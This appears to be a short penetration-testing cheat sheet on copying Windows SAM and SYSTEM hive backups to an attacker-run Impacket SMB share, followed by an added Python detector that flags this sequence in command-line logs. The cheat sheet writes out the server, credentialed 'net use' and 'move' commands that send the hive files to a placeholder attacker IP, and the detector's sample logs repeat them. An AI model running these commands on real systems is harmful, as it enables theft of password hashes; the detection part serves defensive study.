# Connect to Attacker SMB
## Attacker
* Start Impacket's `smbserver.py` on the attacker host, serving the current directory as `share`
```sh
sudo examples/smbserver.py share . -smb2support -username <user> -password <password>
```
## Target
* Connect to the attacker's SMB share
```bat
net use \\<attacker-IP>\share /User:<user> <password>
```
```
* Move the data to the attacker's SMB share
```bat
move sam.bak \\<attacker-IP>\share\sam.bak
move system.bak \\<attacker-IP>\share\system.bak
```
* Disconnect
```bat
net use \\<attacker-IP>\share /del
```
## Workarounds
* System error 1312: the user credentials need a domain, so give the user name as `domain\user`
```bat
net use \\<attacker-IP>\share /USER:<domain>\<user> <password>
```
```
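
Seen from the defender's side, the steps above leave a recognisable sequence in command-line logging: a credentialed `net use` to an IP-literal share, a hive backup written to it, then the unmap. The following Python is an added example, not part of the original cheat sheet; the log layout, host names, addresses and finding labels are constructed assumptions.

```python
import re

# UNC path whose server part is an IPv4 literal, e.g. \\203.0.113.7\share
UNC_IP = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\([^\\\s]+)")
NET_USE = re.compile(r"\bnet1?(?:\.exe)?\s+use\b", re.I)
EXPLICIT_CRED = re.compile(r"/u(?:ser)?:\S+", re.I)
DELETE = re.compile(r"/del(?:ete)?\b", re.I)
TRANSFER = re.compile(r"\b(move|copy|xcopy|robocopy)\b", re.I)
# Hive backup names such as the page's sam.bak / system.bak (heuristic)
HIVE = re.compile(r"\b(sam|system|security)(\.\w+)?\b", re.I)

SAMPLE = [  # constructed (host, command line) pairs, process-creation style
    ("WS01", r"net use \\203.0.113.7\share /User:bob Passw0rd"),
    ("WS01", r"cmd.exe /c move sam.bak \\203.0.113.7\share\sam.bak"),
    ("WS01", r"cmd.exe /c move system.bak \\203.0.113.7\share\system.bak"),
    ("WS01", r"net use \\203.0.113.7\share /del"),
    ("WS02", r"net use \\fileserver01\dept /user:CORP\alice"),
    ("WS03", r"copy report.docx \\10.0.0.5\public\report.docx"),
]

def classify(cmdline):
    """Label one command line, or return None if no IP-literal UNC path is used."""
    unc = UNC_IP.search(cmdline)
    if not unc:
        return None
    if NET_USE.search(cmdline):
        if DELETE.search(cmdline):
            return "unmap_ip_share"
        return "map_ip_share_with_creds" if EXPLICIT_CRED.search(cmdline) else "map_ip_share"
    if TRANSFER.search(cmdline):
        # Only the text before the UNC destination names the local source file
        source = cmdline[:unc.start()]
        return "hive_to_ip_share" if HIVE.search(source) else "file_to_ip_share"
    return None

def findings_by_host(events):
    """Group labels per host, preserving event order."""
    out = {}
    for host, cmdline in events:
        label = classify(cmdline)
        if label:
            out.setdefault(host, []).append(label)
    return out

def is_exfil_sequence(findings):
    """True when a credentialed map to an IP share precedes a hive write."""
    if "map_ip_share_with_creds" not in findings:
        return False
    start = findings.index("map_ip_share_with_creds")
    return "hive_to_ip_share" in findings[start + 1:]
```

`move` and `copy` are `cmd.exe` built-ins, so they reach process-creation logs only when they appear on a `cmd.exe` command line as in the sample; pair this check with monitoring of outbound TCP 445 from workstations.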